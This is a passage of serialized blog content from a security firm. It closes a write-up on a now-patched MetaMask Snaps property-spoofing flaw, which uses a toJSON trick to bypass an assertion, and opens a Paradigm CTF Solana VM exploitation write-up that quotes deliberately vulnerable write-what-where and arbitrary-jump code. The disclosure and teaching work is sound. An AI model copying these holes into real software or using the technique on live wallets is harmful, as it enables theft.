",{"type":24,"tag":301,"props":46886,"children":46887},{"style":348},[46888],{"type":30,"value":4841},{"type":24,"tag":301,"props":46890,"children":46891},{"style":359},[46892],{"type":30,"value":3035},{"type":24,"tag":301,"props":46894,"children":46895},{"class":303,"line":4599},[46896],{"type":24,"tag":301,"props":46897,"children":46898},{"emptyLinePlaceholder":16},[46899],{"type":30,"value":341},{"type":24,"tag":301,"props":46901,"children":46902},{"class":303,"line":4629},[46903,46908,46912,46916,46920,46924],{"type":24,"tag":301,"props":46904,"children":46905},{"style":308},[46906],{"type":30,"value":46907}," switch",{"type":24,"tag":301,"props":46909,"children":46910},{"style":359},[46911],{"type":30,"value":873},{"type":24,"tag":301,"props":46913,"children":46914},{"style":369},[46915],{"type":30,"value":38247},{"type":24,"tag":301,"props":46917,"children":46918},{"style":359},[46919],{"type":30,"value":206},{"type":24,"tag":301,"props":46921,"children":46922},{"style":369},[46923],{"type":30,"value":45052},{"type":24,"tag":301,"props":46925,"children":46926},{"style":359},[46927],{"type":30,"value":398},{"type":24,"tag":301,"props":46929,"children":46930},{"class":303,"line":4659},[46931,46936,46941],{"type":24,"tag":301,"props":46932,"children":46933},{"style":308},[46934],{"type":30,"value":46935}," case",{"type":24,"tag":301,"props":46937,"children":46938},{"style":329},[46939],{"type":30,"value":46940}," 'json'",{"type":24,"tag":301,"props":46942,"children":46943},{"style":359},[46944],{"type":30,"value":12388},{"type":24,"tag":301,"props":46946,"children":46947},{"class":303,"line":4668},[46948,46952,46956],{"type":24,"tag":301,"props":46949,"children":46950},{"style":308},[46951],{"type":30,"value":46092},{"type":24,"tag":301,"props":46953,"children":46954},{"style":314},[46955],{"type":30,"value":46335},{"type":24,"tag":301,"props":46957,"children":46958},{"style":359},[46959],{"type":30,"value":4859},{"type":24,"tag":301,"props":46961,"children":46962},{"class":303,"line":4677},[46963,46967,46972],{"type":24,"tag":301,"props":46964,"children":46965},{"style":308},[46966],{"type":30,"value":46935},{"type":24,"tag":301,"props":46968,"children":46969},{"style":329},[46970],{"type":30,"value":46971}," 'transaction'",{"type":24,"tag":301,"props":46973,"children":46974},{"style":359},[46975],{"type":30,"value":12388},{"type":24,"tag":301,"props":46977,"children":46978},{"class":303,"line":4697},[46979,46983,46987],{"type":24,"tag":301,"props":46980,"children":46981},{"style":308},[46982],{"type":30,"value":46092},{"type":24,"tag":301,"props":46984,"children":46985},{"style":314},[46986],{"type":30,"value":46567},{"type":24,"tag":301,"props":46988,"children":46989},{"style":359},[46990],{"type":30,"value":4859},{"type":24,"tag":301,"props":46992,"children":46993},{"class":303,"line":4725},[46994,46999],{"type":24,"tag":301,"props":46995,"children":46996},{"style":308},[46997],{"type":30,"value":46998}," default",{"type":24,"tag":301,"props":47000,"children":47001},{"style":359},[47002],{"type":30,"value":12388},{"type":24,"tag":301,"props":47004,"children":47005},{"class":303,"line":4733},[47006,47011,47015,47020,47024,47029],{"type":24,"tag":301,"props":47007,"children":47008},{"style":308},[47009],{"type":30,"value":47010}," throw",{"type":24,"tag":301,"props":47012,"children":47013},{"style":348},[47014],{"type":30,"value":38685},{"type":24,"tag":301,"props":47016,"children":47017},{"style":314},[47018],{"type":30,"value":47019}," Error",{"type":24,"tag":301,"props":47021,"children":47022},{"style":359},[47023],{"type":30,"value":362},{"type":24,"tag":301,"props":47025,"children":47026},{"style":329},[47027],{"type":30,"value":47028},"'Method not found.'",{"type":24,"tag":301,"props":47030,"children":47031},{"style":359},[47032],{"type":30,"value":589},{"type":24,"tag":301,"props":47034,"children":47035},{"class":303,"line":4741},[47036],{"type":24,"tag":301,"props":47037,"children":47038},{"style":359},[47039],{"type":30,"value":6918},{"type":24,"tag":301,"props":47041,"children":47042},{"class":303,"line":4757},[47043],{"type":24,"tag":301,"props":47044,"children":47045},{"style":359},[47046],{"type":30,"value":3118},{"type":24,"tag":32,"props":47048,"children":47049},{},[47050,47052,47058,47060,47065],{"type":30,"value":47051},"We set ",{"type":24,"tag":145,"props":47053,"children":47055},{"className":47054},[],[47056],{"type":30,"value":47057},"x.method = \"snap_dialog\"",{"type":30,"value":47059}," to pass the assertion and setup a toJSON function to change this method to ",{"type":24,"tag":145,"props":47061,"children":47063},{"className":47062},[],[47064],{"type":30,"value":46267},{"type":30,"value":47066}," after.",{"type":24,"tag":80,"props":47068,"children":47070},{"id":47069},"mitigation",[47071],{"type":30,"value":47072},"Mitigation",{"type":24,"tag":32,"props":47074,"children":47075},{},[47076,47078,47083,47085,47092],{"type":30,"value":47077},"Metamask mitigated this issue by asserting the arguments after the ",{"type":24,"tag":145,"props":47079,"children":47081},{"className":47080},[],[47082],{"type":30,"value":45814},{"type":30,"value":47084}," function execution. The patch was introduced on commit ",{"type":24,"tag":188,"props":47086,"children":47089},{"href":47087,"rel":47088},"https://github.com/MetaMask/snaps/pull/1762/commits/168ff082102a65e2aad428f44c5b10f9a100c689",[192],[47090],{"type":30,"value":47091},"168ff08",{"type":30,"value":47093}," with the following changes:",{"type":24,"tag":291,"props":47095,"children":47099},{"className":47096,"code":47097,"language":47098,"meta":7,"style":7},"language-diff shiki shiki-themes slack-dark","const request = async (args: RequestArguments) => {\n- assertEthereumOutboundRequest(args);\n- const sanitizedArgs = getSafeJson(args);\n+ const sanitizedArgs = getSafeJson(args) as RequestArguments;\n+ assertEthereumOutboundRequest(sanitizedArgs);\n","diff",[47100],{"type":24,"tag":145,"props":47101,"children":47102},{"__ignoreMap":7},[47103,47111,47119,47127,47135],{"type":24,"tag":301,"props":47104,"children":47105},{"class":303,"line":304},[47106],{"type":24,"tag":301,"props":47107,"children":47108},{"style":359},[47109],{"type":30,"value":47110},"const request = async (args: RequestArguments) => {\n",{"type":24,"tag":301,"props":47112,"children":47113},{"class":303,"line":320},[47114],{"type":24,"tag":301,"props":47115,"children":47116},{"style":329},[47117],{"type":30,"value":47118},"- assertEthereumOutboundRequest(args);\n",{"type":24,"tag":301,"props":47120,"children":47121},{"class":303,"line":335},[47122],{"type":24,"tag":301,"props":47123,"children":47124},{"style":329},[47125],{"type":30,"value":47126},"- const sanitizedArgs = getSafeJson(args);\n",{"type":24,"tag":301,"props":47128,"children":47129},{"class":303,"line":344},[47130],{"type":24,"tag":301,"props":47131,"children":47132},{"style":466},[47133],{"type":30,"value":47134},"+ const sanitizedArgs = getSafeJson(args) as RequestArguments;\n",{"type":24,"tag":301,"props":47136,"children":47137},{"class":303,"line":401},[47138],{"type":24,"tag":301,"props":47139,"children":47140},{"style":466},[47141],{"type":30,"value":47142},"+ assertEthereumOutboundRequest(sanitizedArgs);\n",{"type":24,"tag":43,"props":47144,"children":47145},{"id":9652},[47146],{"type":30,"value":9655},{"type":24,"tag":32,"props":47148,"children":47149},{},[47150],{"type":30,"value":47151},"This unique property spoofing vulnerability in the Snaps sandboxing implementation illustrates the wide range of control attackers have in Javascript, which makes designing robust sandbox implementations an extremely complex task.",{"type":24,"tag":32,"props":47153,"children":47154},{},[47155],{"type":30,"value":47156},"Metamask has implemented numerous layers to mitigate potential exploits, and we're proud to help contribute to making Snaps more secure.",{"type":24,"tag":9672,"props":47158,"children":47159},{},[47160],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":47162},[47163,47164,47171,47179],{"id":25732,"depth":320,"text":25735},{"id":42198,"depth":320,"text":42201,"children":47165},[47166,47167,47168,47169,47170],{"id":42209,"depth":335,"text":42212},{"id":42277,"depth":335,"text":42280},{"id":42313,"depth":335,"text":42316},{"id":43705,"depth":335,"text":43708},{"id":44061,"depth":335,"text":44064},{"id":44847,"depth":320,"text":44850,"children":47172},[47173,47174,47175,47176,47177,47178],{"id":44853,"depth":335,"text":44856},{"id":44897,"depth":335,"text":44900},{"id":45800,"depth":335,"text":45803},{"id":12482,"depth":335,"text":12485},{"id":46240,"depth":335,"text":41577},{"id":47069,"depth":335,"text":47072},{"id":9652,"depth":320,"text":9655},"content:blog:2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps",{"_path":47184,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":47185,"description":47186,"author":47187,"image":47189,"date":47191,"isFeatured":16,"onBlogPage":16,"body":47192,"_type":9700,"_id":52607,"_source":9702,"_file":52608,"_stem":52609,"_extension":9705},"/blog/2023-12-11-jumping-around-in-the-vm","Solana: Jumping Around in the VM","An exploration of low-level Solana VM behavior. How to escalate from a powerful memory corruption primitive to full program control.",[47188,12540],"nicola",{"src":47190},"/posts/jumping-around-in-the-vm/cover.png","2023-12-11",{"type":21,"children":47193,"toc":52596},[47194,47208,47228,47233,47237,47250,47275,47281,47286,47301,47654,47669,47934,47950,48593,48599,48604,48617,48625,48837,48845,49148,49156,49299,49307,49832,49838,49850,49863,49877,49882,50647,50652,50660,50665,50671,50683,50748,50753,50766,50779,50785,50813,51963,51976,52018,52023,52028,52042,52182,52203,52224,52231,52282,52290,52301,52314,52319,52443,52456,52558,52562,52575,52580,52592],{"type":24,"tag":32,"props":47195,"children":47196},{},[47197,47199,47206],{"type":30,"value":47198},"In the world of CTFs, ",{"type":24,"tag":188,"props":47200,"children":47203},{"href":47201,"rel":47202},"https://twitter.com/paradigm_ctf",[192],[47204],{"type":30,"value":47205},"Paradigm CTF 2023",{"type":30,"value":47207}," was like no other. Presenting a unique Solana challenge, the goal was to leverage Jump Oriented Programming, a web2 binary exploitation technique, inside the Solana VM to achieve arbitrary CPI execution.",{"type":24,"tag":32,"props":47209,"children":47210},{},[47211,47213,47220,47221],{"type":30,"value":47212},"To succeed in this challenge, a strong understanding of the Solana VM is required. We've explored parts of the Solana VM internals in two previous blog posts: ",{"type":24,"tag":188,"props":47214,"children":47217},{"href":47215,"rel":47216},"https://osec.io/blog/2022-03-14-solana-security-intro",[192],[47218],{"type":30,"value":47219},"Solana: An Auditor's Introduction",{"type":30,"value":2378},{"type":24,"tag":188,"props":47222,"children":47225},{"href":47223,"rel":47224},"https://osec.io/blog/2022-08-27-reverse-engineering-solana",[192],[47226],{"type":30,"value":47227},"Reverse Engineering Solana with Binary Ninja.\n",{"type":24,"tag":32,"props":47229,"children":47230},{},[47231],{"type":30,"value":47232},"In this comprehensive overview, we'll break down critical components of the Solana BPF VM necessary to write a complete memory-corruption exploit. We then turn an arbitrary function call and memory write primitive into a full exploit.",{"type":24,"tag":43,"props":47234,"children":47235},{"id":25732},[47236],{"type":30,"value":25735},{"type":24,"tag":32,"props":47238,"children":47239},{},[47240,47242,47248],{"type":30,"value":47241},"The challenge itself resides into ",{"type":24,"tag":145,"props":47243,"children":47245},{"className":47244},[],[47246],{"type":30,"value":47247},"framework/",{"type":30,"value":47249},", and is composed of 2 parts:",{"type":24,"tag":2655,"props":47251,"children":47252},{},[47253,47264],{"type":24,"tag":2659,"props":47254,"children":47255},{},[47256,47262],{"type":24,"tag":145,"props":47257,"children":47259},{"className":47258},[],[47260],{"type":30,"value":47261},"framework/chall/lib.rs",{"type":30,"value":47263},": The on-chain eBPF program that needs to be exploited.",{"type":24,"tag":2659,"props":47265,"children":47266},{},[47267,47273],{"type":24,"tag":145,"props":47268,"children":47270},{"className":47269},[],[47271],{"type":30,"value":47272},"framework/src/main.rs",{"type":30,"value":47274},": Program that setups a solana test environment, gets a single instruction and make it possible to users to interact with the on-chain program.",{"type":24,"tag":80,"props":47276,"children":47278},{"id":47277},"vulnerable-program",[47279],{"type":30,"value":47280},"Vulnerable Program",{"type":24,"tag":32,"props":47282,"children":47283},{},[47284],{"type":30,"value":47285},"The program is simple: it parses the input data and does something based on the first byte. Each potential action is quite out of the ordinary though!",{"type":24,"tag":6246,"props":47287,"children":47288},{},[47289],{"type":24,"tag":2659,"props":47290,"children":47291},{},[47292,47293,47299],{"type":30,"value":8842},{"type":24,"tag":145,"props":47294,"children":47296},{"className":47295},[],[47297],{"type":30,"value":47298},"data[0] == 0",{"type":30,"value":47300}," a function that lets you write-what-where is executed",{"type":24,"tag":291,"props":47302,"children":47304},{"className":9818,"code":47303,"language":9817,"meta":7,"style":7},"#[inline(never)]\npub fn write(data: &[u8]) {\n unsafe {\n let ptr = std::mem::transmute::\u003C[u8; 8], *mut u64>(data[..8].try_into().unwrap());\n let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n ptr.write_volatile(val);\n }\n}\n",[47305],{"type":24,"tag":145,"props":47306,"children":47307},{"__ignoreMap":7},[47308,47316,47361,47372,47495,47611,47640,47647],{"type":24,"tag":301,"props":47309,"children":47310},{"class":303,"line":304},[47311],{"type":24,"tag":301,"props":47312,"children":47313},{"style":359},[47314],{"type":30,"value":47315},"#[inline(never)]\n",{"type":24,"tag":301,"props":47317,"children":47318},{"class":303,"line":320},[47319,47323,47327,47332,47336,47340,47344,47348,47352,47356],{"type":24,"tag":301,"props":47320,"children":47321},{"style":348},[47322],{"type":30,"value":20484},{"type":24,"tag":301,"props":47324,"children":47325},{"style":348},[47326],{"type":30,"value":20489},{"type":24,"tag":301,"props":47328,"children":47329},{"style":314},[47330],{"type":30,"value":47331}," write",{"type":24,"tag":301,"props":47333,"children":47334},{"style":359},[47335],{"type":30,"value":362},{"type":24,"tag":301,"props":47337,"children":47338},{"style":369},[47339],{"type":30,"value":10528},{"type":24,"tag":301,"props":47341,"children":47342},{"style":385},[47343],{"type":30,"value":1679},{"type":24,"tag":301,"props":47345,"children":47346},{"style":385},[47347],{"type":30,"value":991},{"type":24,"tag":301,"props":47349,"children":47350},{"style":359},[47351],{"type":30,"value":541},{"type":24,"tag":301,"props":47353,"children":47354},{"style":10246},[47355],{"type":30,"value":10249},{"type":24,"tag":301,"props":47357,"children":47358},{"style":359},[47359],{"type":30,"value":47360},"]) {\n",{"type":24,"tag":301,"props":47362,"children":47363},{"class":303,"line":335},[47364,47368],{"type":24,"tag":301,"props":47365,"children":47366},{"style":348},[47367],{"type":30,"value":20626},{"type":24,"tag":301,"props":47369,"children":47370},{"style":359},[47371],{"type":30,"value":3035},{"type":24,"tag":301,"props":47373,"children":47374},{"class":303,"line":344},[47375,47379,47383,47387,47392,47396,47401,47405,47410,47414,47419,47423,47427,47431,47435,47439,47443,47447,47451,47455,47459,47463,47467,47471,47475,47479,47483,47487,47491],{"type":24,"tag":301,"props":47376,"children":47377},{"style":348},[47378],{"type":30,"value":9900},{"type":24,"tag":301,"props":47380,"children":47381},{"style":369},[47382],{"type":30,"value":20650},{"type":24,"tag":301,"props":47384,"children":47385},{"style":385},[47386],{"type":30,"value":2537},{"type":24,"tag":301,"props":47388,"children":47389},{"style":359},[47390],{"type":30,"value":47391}," std",{"type":24,"tag":301,"props":47393,"children":47394},{"style":385},[47395],{"type":30,"value":10308},{"type":24,"tag":301,"props":47397,"children":47398},{"style":359},[47399],{"type":30,"value":47400},"mem",{"type":24,"tag":301,"props":47402,"children":47403},{"style":385},[47404],{"type":30,"value":10308},{"type":24,"tag":301,"props":47406,"children":47407},{"style":314},[47408],{"type":30,"value":47409},"transmute",{"type":24,"tag":301,"props":47411,"children":47412},{"style":385},[47413],{"type":30,"value":10308},{"type":24,"tag":301,"props":47415,"children":47416},{"style":359},[47417],{"type":30,"value":47418},"\u003C[",{"type":24,"tag":301,"props":47420,"children":47421},{"style":10246},[47422],{"type":30,"value":10249},{"type":24,"tag":301,"props":47424,"children":47425},{"style":359},[47426],{"type":30,"value":3940},{"type":24,"tag":301,"props":47428,"children":47429},{"style":466},[47430],{"type":30,"value":10900},{"type":24,"tag":301,"props":47432,"children":47433},{"style":359},[47434],{"type":30,"value":551},{"type":24,"tag":301,"props":47436,"children":47437},{"style":385},[47438],{"type":30,"value":772},{"type":24,"tag":301,"props":47440,"children":47441},{"style":348},[47442],{"type":30,"value":10550},{"type":24,"tag":301,"props":47444,"children":47445},{"style":10246},[47446],{"type":30,"value":12680},{"type":24,"tag":301,"props":47448,"children":47449},{"style":359},[47450],{"type":30,"value":14426},{"type":24,"tag":301,"props":47452,"children":47453},{"style":369},[47454],{"type":30,"value":10528},{"type":24,"tag":301,"props":47456,"children":47457},{"style":359},[47458],{"type":30,"value":541},{"type":24,"tag":301,"props":47460,"children":47461},{"style":385},[47462],{"type":30,"value":9887},{"type":24,"tag":301,"props":47464,"children":47465},{"style":466},[47466],{"type":30,"value":10900},{"type":24,"tag":301,"props":47468,"children":47469},{"style":359},[47470],{"type":30,"value":22200},{"type":24,"tag":301,"props":47472,"children":47473},{"style":385},[47474],{"type":30,"value":206},{"type":24,"tag":301,"props":47476,"children":47477},{"style":314},[47478],{"type":30,"value":32918},{"type":24,"tag":301,"props":47480,"children":47481},{"style":359},[47482],{"type":30,"value":20672},{"type":24,"tag":301,"props":47484,"children":47485},{"style":385},[47486],{"type":30,"value":206},{"type":24,"tag":301,"props":47488,"children":47489},{"style":314},[47490],{"type":30,"value":10492},{"type":24,"tag":301,"props":47492,"children":47493},{"style":359},[47494],{"type":30,"value":22214},{"type":24,"tag":301,"props":47496,"children":47497},{"class":303,"line":401},[47498,47502,47507,47511,47515,47519,47523,47527,47531,47535,47539,47543,47547,47551,47555,47559,47563,47567,47571,47575,47579,47583,47587,47591,47595,47599,47603,47607],{"type":24,"tag":301,"props":47499,"children":47500},{"style":348},[47501],{"type":30,"value":9900},{"type":24,"tag":301,"props":47503,"children":47504},{"style":369},[47505],{"type":30,"value":47506}," val",{"type":24,"tag":301,"props":47508,"children":47509},{"style":385},[47510],{"type":30,"value":2537},{"type":24,"tag":301,"props":47512,"children":47513},{"style":359},[47514],{"type":30,"value":47391},{"type":24,"tag":301,"props":47516,"children":47517},{"style":385},[47518],{"type":30,"value":10308},{"type":24,"tag":301,"props":47520,"children":47521},{"style":359},[47522],{"type":30,"value":47400},{"type":24,"tag":301,"props":47524,"children":47525},{"style":385},[47526],{"type":30,"value":10308},{"type":24,"tag":301,"props":47528,"children":47529},{"style":314},[47530],{"type":30,"value":47409},{"type":24,"tag":301,"props":47532,"children":47533},{"style":385},[47534],{"type":30,"value":10308},{"type":24,"tag":301,"props":47536,"children":47537},{"style":359},[47538],{"type":30,"value":47418},{"type":24,"tag":301,"props":47540,"children":47541},{"style":10246},[47542],{"type":30,"value":10249},{"type":24,"tag":301,"props":47544,"children":47545},{"style":359},[47546],{"type":30,"value":3940},{"type":24,"tag":301,"props":47548,"children":47549},{"style":466},[47550],{"type":30,"value":10900},{"type":24,"tag":301,"props":47552,"children":47553},{"style":359},[47554],{"type":30,"value":551},{"type":24,"tag":301,"props":47556,"children":47557},{"style":10246},[47558],{"type":30,"value":14857},{"type":24,"tag":301,"props":47560,"children":47561},{"style":359},[47562],{"type":30,"value":14426},{"type":24,"tag":301,"props":47564,"children":47565},{"style":369},[47566],{"type":30,"value":10528},{"type":24,"tag":301,"props":47568,"children":47569},{"style":359},[47570],{"type":30,"value":541},{"type":24,"tag":301,"props":47572,"children":47573},{"style":466},[47574],{"type":30,"value":10900},{"type":24,"tag":301,"props":47576,"children":47577},{"style":385},[47578],{"type":30,"value":9887},{"type":24,"tag":301,"props":47580,"children":47581},{"style":466},[47582],{"type":30,"value":3073},{"type":24,"tag":301,"props":47584,"children":47585},{"style":359},[47586],{"type":30,"value":22200},{"type":24,"tag":301,"props":47588,"children":47589},{"style":385},[47590],{"type":30,"value":206},{"type":24,"tag":301,"props":47592,"children":47593},{"style":314},[47594],{"type":30,"value":32918},{"type":24,"tag":301,"props":47596,"children":47597},{"style":359},[47598],{"type":30,"value":20672},{"type":24,"tag":301,"props":47600,"children":47601},{"style":385},[47602],{"type":30,"value":206},{"type":24,"tag":301,"props":47604,"children":47605},{"style":314},[47606],{"type":30,"value":10492},{"type":24,"tag":301,"props":47608,"children":47609},{"style":359},[47610],{"type":30,"value":22214},{"type":24,"tag":301,"props":47612,"children":47613},{"class":303,"line":415},[47614,47619,47623,47628,47632,47636],{"type":24,"tag":301,"props":47615,"children":47616},{"style":369},[47617],{"type":30,"value":47618}," ptr",{"type":24,"tag":301,"props":47620,"children":47621},{"style":385},[47622],{"type":30,"value":206},{"type":24,"tag":301,"props":47624,"children":47625},{"style":314},[47626],{"type":30,"value":47627},"write_volatile",{"type":24,"tag":301,"props":47629,"children":47630},{"style":359},[47631],{"type":30,"value":362},{"type":24,"tag":301,"props":47633,"children":47634},{"style":369},[47635],{"type":30,"value":19427},{"type":24,"tag":301,"props":47637,"children":47638},{"style":359},[47639],{"type":30,"value":589},{"type":24,"tag":301,"props":47641,"children":47642},{"class":303,"line":439},[47643],{"type":24,"tag":301,"props":47644,"children":47645},{"style":359},[47646],{"type":30,"value":501},{"type":24,"tag":301,"props":47648,"children":47649},{"class":303,"line":447},[47650],{"type":24,"tag":301,"props":47651,"children":47652},{"style":359},[47653],{"type":30,"value":698},{"type":24,"tag":6246,"props":47655,"children":47656},{"start":320},[47657],{"type":24,"tag":2659,"props":47658,"children":47659},{},[47660,47661,47667],{"type":30,"value":8842},{"type":24,"tag":145,"props":47662,"children":47664},{"className":47663},[],[47665],{"type":30,"value":47666},"data[0] == 1",{"type":30,"value":47668},", a CPI to a non-existent program is executed:",{"type":24,"tag":291,"props":47670,"children":47672},{"className":9818,"code":47671,"language":9817,"meta":7,"style":7},"#[inline(never)]\npub fn call(data: &[u8]) {\n let ix = Instruction {\n program_id: pubkey!(\"osecio5555555555555551111111111111111111111\"),\n data: data.try_into().unwrap(),\n accounts: vec![]\n };\n\n invoke_signed_unchecked(\n &ix,\n &[],\n &[],\n ).unwrap();\n}\n",[47673],{"type":24,"tag":145,"props":47674,"children":47675},{"__ignoreMap":7},[47676,47683,47727,47752,47782,47822,47843,47850,47857,47869,47885,47897,47908,47927],{"type":24,"tag":301,"props":47677,"children":47678},{"class":303,"line":304},[47679],{"type":24,"tag":301,"props":47680,"children":47681},{"style":359},[47682],{"type":30,"value":47315},{"type":24,"tag":301,"props":47684,"children":47685},{"class":303,"line":320},[47686,47690,47694,47699,47703,47707,47711,47715,47719,47723],{"type":24,"tag":301,"props":47687,"children":47688},{"style":348},[47689],{"type":30,"value":20484},{"type":24,"tag":301,"props":47691,"children":47692},{"style":348},[47693],{"type":30,"value":20489},{"type":24,"tag":301,"props":47695,"children":47696},{"style":314},[47697],{"type":30,"value":47698}," call",{"type":24,"tag":301,"props":47700,"children":47701},{"style":359},[47702],{"type":30,"value":362},{"type":24,"tag":301,"props":47704,"children":47705},{"style":369},[47706],{"type":30,"value":10528},{"type":24,"tag":301,"props":47708,"children":47709},{"style":385},[47710],{"type":30,"value":1679},{"type":24,"tag":301,"props":47712,"children":47713},{"style":385},[47714],{"type":30,"value":991},{"type":24,"tag":301,"props":47716,"children":47717},{"style":359},[47718],{"type":30,"value":541},{"type":24,"tag":301,"props":47720,"children":47721},{"style":10246},[47722],{"type":30,"value":10249},{"type":24,"tag":301,"props":47724,"children":47725},{"style":359},[47726],{"type":30,"value":47360},{"type":24,"tag":301,"props":47728,"children":47729},{"class":303,"line":335},[47730,47734,47739,47743,47748],{"type":24,"tag":301,"props":47731,"children":47732},{"style":348},[47733],{"type":30,"value":9838},{"type":24,"tag":301,"props":47735,"children":47736},{"style":369},[47737],{"type":30,"value":47738}," ix",{"type":24,"tag":301,"props":47740,"children":47741},{"style":385},[47742],{"type":30,"value":2537},{"type":24,"tag":301,"props":47744,"children":47745},{"style":10246},[47746],{"type":30,"value":47747}," Instruction",{"type":24,"tag":301,"props":47749,"children":47750},{"style":359},[47751],{"type":30,"value":3035},{"type":24,"tag":301,"props":47753,"children":47754},{"class":303,"line":344},[47755,47760,47764,47769,47773,47778],{"type":24,"tag":301,"props":47756,"children":47757},{"style":369},[47758],{"type":30,"value":47759}," program_id",{"type":24,"tag":301,"props":47761,"children":47762},{"style":385},[47763],{"type":30,"value":1679},{"type":24,"tag":301,"props":47765,"children":47766},{"style":314},[47767],{"type":30,"value":47768}," pubkey!",{"type":24,"tag":301,"props":47770,"children":47771},{"style":359},[47772],{"type":30,"value":362},{"type":24,"tag":301,"props":47774,"children":47775},{"style":329},[47776],{"type":30,"value":47777},"\"osecio5555555555555551111111111111111111111\"",{"type":24,"tag":301,"props":47779,"children":47780},{"style":359},[47781],{"type":30,"value":4656},{"type":24,"tag":301,"props":47783,"children":47784},{"class":303,"line":401},[47785,47790,47794,47798,47802,47806,47810,47814,47818],{"type":24,"tag":301,"props":47786,"children":47787},{"style":369},[47788],{"type":30,"value":47789}," data",{"type":24,"tag":301,"props":47791,"children":47792},{"style":385},[47793],{"type":30,"value":1679},{"type":24,"tag":301,"props":47795,"children":47796},{"style":369},[47797],{"type":30,"value":21895},{"type":24,"tag":301,"props":47799,"children":47800},{"style":385},[47801],{"type":30,"value":206},{"type":24,"tag":301,"props":47803,"children":47804},{"style":314},[47805],{"type":30,"value":32918},{"type":24,"tag":301,"props":47807,"children":47808},{"style":359},[47809],{"type":30,"value":20672},{"type":24,"tag":301,"props":47811,"children":47812},{"style":385},[47813],{"type":30,"value":206},{"type":24,"tag":301,"props":47815,"children":47816},{"style":314},[47817],{"type":30,"value":10492},{"type":24,"tag":301,"props":47819,"children":47820},{"style":359},[47821],{"type":30,"value":10318},{"type":24,"tag":301,"props":47823,"children":47824},{"class":303,"line":415},[47825,47830,47834,47838],{"type":24,"tag":301,"props":47826,"children":47827},{"style":369},[47828],{"type":30,"value":47829}," accounts",{"type":24,"tag":301,"props":47831,"children":47832},{"style":385},[47833],{"type":30,"value":1679},{"type":24,"tag":301,"props":47835,"children":47836},{"style":314},[47837],{"type":30,"value":10555},{"type":24,"tag":301,"props":47839,"children":47840},{"style":359},[47841],{"type":30,"value":47842},"[]\n",{"type":24,"tag":301,"props":47844,"children":47845},{"class":303,"line":439},[47846],{"type":24,"tag":301,"props":47847,"children":47848},{"style":359},[47849],{"type":30,"value":3085},{"type":24,"tag":301,"props":47851,"children":47852},{"class":303,"line":447},[47853],{"type":24,"tag":301,"props":47854,"children":47855},{"emptyLinePlaceholder":16},[47856],{"type":30,"value":341},{"type":24,"tag":301,"props":47858,"children":47859},{"class":303,"line":476},[47860,47865],{"type":24,"tag":301,"props":47861,"children":47862},{"style":314},[47863],{"type":30,"value":47864}," invoke_signed_unchecked",{"type":24,"tag":301,"props":47866,"children":47867},{"style":359},[47868],{"type":30,"value":1707},{"type":24,"tag":301,"props":47870,"children":47871},{"class":303,"line":495},[47872,47876,47881],{"type":24,"tag":301,"props":47873,"children":47874},{"style":385},[47875],{"type":30,"value":10298},{"type":24,"tag":301,"props":47877,"children":47878},{"style":369},[47879],{"type":30,"value":47880},"ix",{"type":24,"tag":301,"props":47882,"children":47883},{"style":359},[47884],{"type":30,"value":1729},{"type":24,"tag":301,"props":47886,"children":47887},{"class":303,"line":504},[47888,47892],{"type":24,"tag":301,"props":47889,"children":47890},{"style":385},[47891],{"type":30,"value":10298},{"type":24,"tag":301,"props":47893,"children":47894},{"style":359},[47895],{"type":30,"value":47896},"[],\n",{"type":24,"tag":301,"props":47898,"children":47899},{"class":303,"line":512},[47900,47904],{"type":24,"tag":301,"props":47901,"children":47902},{"style":385},[47903],{"type":30,"value":10298},{"type":24,"tag":301,"props":47905,"children":47906},{"style":359},[47907],{"type":30,"value":47896},{"type":24,"tag":301,"props":47909,"children":47910},{"class":303,"line":592},[47911,47915,47919,47923],{"type":24,"tag":301,"props":47912,"children":47913},{"style":359},[47914],{"type":30,"value":10483},{"type":24,"tag":301,"props":47916,"children":47917},{"style":385},[47918],{"type":30,"value":206},{"type":24,"tag":301,"props":47920,"children":47921},{"style":314},[47922],{"type":30,"value":10492},{"type":24,"tag":301,"props":47924,"children":47925},{"style":359},[47926],{"type":30,"value":4859},{"type":24,"tag":301,"props":47928,"children":47929},{"class":303,"line":619},[47930],{"type":24,"tag":301,"props":47931,"children":47932},{"style":359},[47933],{"type":30,"value":698},{"type":24,"tag":6246,"props":47935,"children":47936},{"start":335},[47937],{"type":24,"tag":2659,"props":47938,"children":47939},{},[47940,47942,47948],{"type":30,"value":47941},"Finally, if ",{"type":24,"tag":145,"props":47943,"children":47945},{"className":47944},[],[47946],{"type":30,"value":47947},"data[0]",{"type":30,"value":47949}," is neither 0 nor 1, a function that lets you jump to an arbitrary address, passing an arbitrary value as the first parameter is executed:",{"type":24,"tag":291,"props":47951,"children":47953},{"className":9818,"code":47952,"language":9817,"meta":7,"style":7},"#[inline(never)]\npub fn process(mut data: &[u8]) {\n unsafe {\n let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n ptr(val);\n\n data = &data[16..];\n\n let ptr = std::mem::transmute::\u003C[u8; 8], fn(u64)>(data[..8].try_into().unwrap());\n let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n ptr(val);\n }\n}\n",[47954],{"type":24,"tag":145,"props":47955,"children":47956},{"__ignoreMap":7},[47957,47964,48012,48023,48143,48258,48277,48284,48319,48326,48445,48560,48579,48586],{"type":24,"tag":301,"props":47958,"children":47959},{"class":303,"line":304},[47960],{"type":24,"tag":301,"props":47961,"children":47962},{"style":359},[47963],{"type":30,"value":47315},{"type":24,"tag":301,"props":47965,"children":47966},{"class":303,"line":320},[47967,47971,47975,47980,47984,47988,47992,47996,48000,48004,48008],{"type":24,"tag":301,"props":47968,"children":47969},{"style":348},[47970],{"type":30,"value":20484},{"type":24,"tag":301,"props":47972,"children":47973},{"style":348},[47974],{"type":30,"value":20489},{"type":24,"tag":301,"props":47976,"children":47977},{"style":314},[47978],{"type":30,"value":47979}," 